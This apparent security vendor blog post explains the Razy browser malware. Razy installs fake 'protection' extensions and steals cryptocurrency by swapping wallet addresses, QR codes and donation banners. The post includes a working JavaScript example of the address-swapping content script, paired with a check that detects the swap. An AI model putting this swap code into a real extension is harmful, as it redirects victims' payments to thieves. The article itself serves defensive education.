Razy: Browser Malware that Steals Cryptocurrency
Malware that infects the browser can do serious damage to users. It can alter any page, inserting ads and changing existing content. It can redirect online payments. A piece of Windows malware called Razy turned up recently; it installs a malicious browser extension that carries a slew of techniques for stealing cryptocurrency. The installer is specific to Windows, but the extension targets at least three different browsers: Firefox, Chrome, and the Russian Yandex Browser.
How Razy gets into the browser
Browser plugins or extensions are useful things. They let people get extra information about sites, block unwanted ads, and warn about untrusted pages. The problem comes when they aren't supposed to be there, or when they don't do what they advertise. The extension APIs let a content script read and rewrite any part of a page, and the browser doesn't distinguish helpful rewriting from hostile rewriting.
A secure (HTTPS) connection to the site doesn't help. TLS protects the data in transit: the correct, unaltered page travels from the website to the browser, and the certificate check passes. A malicious extension runs after that, inside the browser, and changes the page once it has already been decrypted, verified, and rendered.
People let Razy onto their machines when they download supposedly useful software, either from actively malicious sites or from ones that don't screen their offerings well enough. The installer first disables the browser's integrity check for installed extensions, as well as automatic updates, so that the tampered extension files are neither flagged nor overwritten. Then it installs the Razy extension. On Firefox it's called "Firefox Protection," and on Yandex Browser it's "Yandex Protect." It does anything but protect. On Chrome, it isn't even visible in the list of extensions.
How Razy robs users
Razy's specialty is stealing cryptocurrency, such as Bitcoin. It has a whole collection of ways to do it:
Cryptocurrency payments are made to "wallets," which are identified by long strings of characters (addresses). Razy replaces Bitcoin and Ethereum addresses on visited pages with the attacker's own, so any payment goes to the thief instead of the intended payee. Cryptocurrency payments are pseudonymous and irreversible. The victim won't know anything went wrong until the recipient complains about not getting paid. Then it's too late.
Some currency exchanges accept payments by displaying a QR code of the deposit address for users to scan with their phones. Razy swaps in a QR code for its own wallet. Users think they're buying currency to add to their own accounts, but they're actually sending funds to the people operating the scam.
Razy injects "special offers" into currency exchanges to entice people to buy more Bitcoin or Ethereum. Again, the money goes to the thieves instead of to the user's wallet.
When users visit Wikipedia, Razy injects a banner asking for donations. Once again, the donations go to the scammers rather than to the Wikimedia Foundation. Other popular sites are similarly altered in the browser.
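The substitution at the heart of Razy's wallet theft, and the reason a verified HTTPS connection doesn't protect against it, can be shown in a few lines. The block below is an added example written for this article, not Razy's own code. It rewrites Bitcoin and Ethereum addresses in page text the way a malicious content script would after the browser has decrypted and rendered the page, and then shows the defender's check: comparing what the browser displays against the copy the server actually sent. The page text, the wallet addresses and the function names are all constructed for the example.

```javascript
// Added example for this article, not Razy's code: the address-swapping step
// of a wallet-stealing content script, written as plain functions so it runs
// in Node without a DOM. A real extension would apply swapAddresses() to each
// text node of the rendered page (e.g. via a TreeWalker), after the browser
// has already finished TLS verification. All addresses below are constructed
// sample values, not real Razy wallets.

// Legacy (1.../3...) and bech32 (bc1...) Bitcoin addresses, and 0x-prefixed
// 20-byte Ethereum addresses. Word boundaries stop hex runs inside an
// Ethereum address from being mistaken for a Bitcoin address.
const BTC_ADDRESS = /\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{25,59})\b/g;
const ETH_ADDRESS = /\b0x[0-9a-fA-F]{40}\b/g;

// Where the attacker wants every payment redirected (constructed values).
const ATTACKER = {
  btc: "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
  eth: "0x8617E340B3D01FA5F11F306F4090FD50E238070D",
};

// Rewrite every wallet address in `text` to the attacker's address of the
// same kind. Returns the new text plus a record of what was replaced.
// Addresses that are already the attacker's are left alone, so running the
// script twice on the same page is harmless to the attacker.
function swapAddresses(text, attacker = ATTACKER) {
  const swapped = [];
  const rewrite = (kind, replacement) => (match) => {
    if (match === replacement) return match;
    swapped.push({ kind, original: match });
    return replacement;
  };
  const out = text
    .replace(BTC_ADDRESS, rewrite("btc", attacker.btc))
    .replace(ETH_ADDRESS, rewrite("eth", attacker.eth));
  return { text: out, swapped };
}

// Defender side: the server-delivered copy of a page (fetched outside the
// browser, e.g. with curl, or viewed with all extensions disabled) is the
// ground truth. Any address present in the rendered page but absent from the
// server copy was injected client-side.
function extractAddresses(text) {
  const found = new Set();
  for (const re of [BTC_ADDRESS, ETH_ADDRESS]) {
    for (const m of text.matchAll(re)) found.add(m[0]);
  }
  return found;
}

function findInjectedAddresses(serverText, renderedText) {
  const expected = extractAddresses(serverText);
  return [...extractAddresses(renderedText)].filter((a) => !expected.has(a));
}

// Constructed sample page: a donation page as the server actually sends it.
const SERVER_PAGE = [
  "Donate BTC: 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2",
  "Donate ETH: 0x52908400098527886E0F7030069857D2E4169EE7",
  "Questions? support@example.org",
].join("\n");

// What the victim sees after the content script has run.
const RENDERED_PAGE = swapAddresses(SERVER_PAGE).text;

console.log(RENDERED_PAGE);
console.log("Injected addresses:", findInjectedAddresses(SERVER_PAGE, RENDERED_PAGE));
```

The same comparison is the practical check for a suspicious page: fetch it once outside the browser, or open it in a clean profile with extensions disabled, and diff the payment addresses. Razy's QR-code swap is the same substitution one level up, with the attacker's address encoded into the image instead of the text.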
Malicious browser plugins
Browser plugins which do harmful things are nothing new. Razy just pushes their capabilities more than most do. Other types include:
Keyloggers. They collect all the user's keystrokes, including credit card numbers and passwords, and send them to a server somewhere. Some keyloggers serve legitimate purposes, but most are intended to steal information.
Other spyware. In addition to capturing keystrokes, spyware can record all the sites a user visits, read mail, and capture private social media messages. All that information can be useful for identity theft or creating convincing forged email.
Adware. The plugin can inject ads with links to dangerous or dishonest websites, or sometimes to semi-legitimate sites that use shady methods of attracting customers.
Unauthorised Web activity. A malicious plugin can send requests in the background. It could spam the user's friends, access online banking, or participate in a DDoS attack.
Users need to be careful about the software they download. They should watch for any unexpected changes in the appearance of familiar websites, and before sending a cryptocurrency payment they should confirm the address against what the site shows with all extensions disabled or in a fresh browser profile. Browser malware like Razy can lead not just to inconvenience, but to serious financial loss. If you're looking to develop a better cybersecurity strategy, talk to us.